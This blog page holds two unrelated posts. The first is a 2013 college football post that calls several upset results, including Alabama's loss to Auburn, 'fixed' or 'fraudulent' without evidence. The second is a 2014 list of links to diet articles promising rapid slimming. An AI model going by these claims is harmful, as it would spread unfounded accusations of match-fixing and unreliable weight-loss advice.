I'm going to go out on a limb today (Nov. 17, 2013) and predict that either Alabama, Florida State or Ohio State will lose before the BCS Championship Game matchup is finalized. The reason why I say that is, unless one of them loses, we'll have three undefeated teams, and one will be left out of the championship game, creating more controversy for the already beleaguered and corrupt system.

Make that five teams that are undefeated, including Baylor and Northern Illinois. Baylor will probably lose, too, because I doubt that the NCAA wants to see Baylor in the championship game. We'll see. Northern Illinois might be allowed to go undefeated, since they're in the Mid-American Conference and won't create too much controversy when they get shut out of the BCS title game.

(Editor's note: Sure enough, the prediction I made on Nov. 17 came true, because Baylor got trounced by Oklahoma State in a highly suspicious game on Nov. 23, and Alabama lost to Auburn in another crooked game on Nov. 30 when they allowed a 100-yard touchdown on the last play of the game.

That left Florida State and Ohio State as the only two undefeated teams left from the so-called power conferences going into Dec. 7, but then the Buckeyes lost to Michigan State, so that left FSU as the only undefeated team. Northern Illinois got hammered by Bowling Green in another fixed game to knock them from the ranks of the undefeated.

Ohio State's loss opened the door for Auburn to qualify for the BCS Championship Game, thanks to the Tigers' fraudulent last-second victories over Georgia and Alabama. I have no idea why, but it's obvious that the powers that control college football wanted Auburn in the title game this season.)

I remember when big plays hardly ever happened. Titanic defensive struggles were the order of the day. Now, almost every game features a touchdown of 50 yards or more as defensive players suddenly find they're unable to make an open-field tackle.

I guess the NFL and the NCAA think the games are more exciting with all these big plays happening. But I don't. There was a time when a 75-yard touchdown run meant something. Now it's just another example of corruption.

Friday, September 19, 2014

Fruit Slimming Blog Roundup

Key points for autumn weight loss: http://ssw5.blogspot.com.au/2014/08/AutumnWeightLossMainPoints.html#.U-6cKPmSzEY
5 autumn weight-loss foods: http://ssw5.blogspot.com.au/2014/08/AutumnWeightLoss5Foods.html#.U_n61fmSzEY
Celery weight-loss recipes: http://ssw5.blogspot.com.au/2014/09/CeleryWeightLossRecipes.html#.VAsIf_mSzEY
Star Zhao Wei's slimming success: http://ssw5.blogspot.com.au/2014/08/StarZhaoWeiWeightLossSuccess.html#.VAH1Q_mSzEY
Eat vitamins to get slim: http://ssw5.blogspot.com.au/2014/08/VitaminDiet.html#.U-nAFvmSzEY
Chinese cabbage diet: http://ssw5.blogspot.com.au/2014/09/ChineseCabbageDiet.html#.VAWhsvmSzEY
Get slim without dieting: http://ssw5.blogspot.com.au/2014/08/8kindsOfTheBestDietFood.html#.U-iwD_mSzEY
The healthiest weight-loss method: http://ssw5.blogspot.com.au/2014/08/TheMostHealthyDiet.html#.VAMJd_mSzEY
Big S's slimming tricks: http://ssw5.blogspot.com.au/2014/08/BigSWeightLossHaveCoup.html#.U_XehvmSzEY
Chili pepper diet: http://ssw5.blogspot.com.au/2014/09/BellPepperDiet.html#.VAhG7fmSzEY
Recipes to lose 8 jin in a week: http://ssw5.blogspot.com.au/2014/09/ChineseCabbageDiet3.html#.VAb9iPmSzEY8
Stars slim down without losing their bust: http://ssw5.blogspot.com.au/2014/08/EuropeanAndAmericanAtarsWeightLossNotThinBreasts.html#.U_8R8fmSzEY
Tomato diet: http://ssw5.blogspot.com.au/2014/09/TomatoDiet.html#.VARQ5vmSzEY
Reliable slimming methods: http://ssw5.blogspot.com.au/2014/07/SlimmingWaysBySpectrum.html#.U9oxSPmSzEY
Fish Leong's rapid slimming: http://ssw5.blogspot.com.au/2014/07/FishLeongQuickWeightLoss.html#.U9jYOfmSx3M
Ultra-low-calorie diet foods: http://ssw5.blogspot.com.au/2014/07/10KindsOfUltra-LowCardDietFood.html#.U9ZgpvmSzEY
Eight big mistakes new mothers make when slimming: http://ssw5.blogspot.com.au/2014/07/TheNewMomSlimmingEightBigMistake.html
The fastest weight-loss and slimming methods: http://ssw5.blogspot.com.au/2014/07/ThefastestWeightLossMethod.html#.U8xvpvmSzEY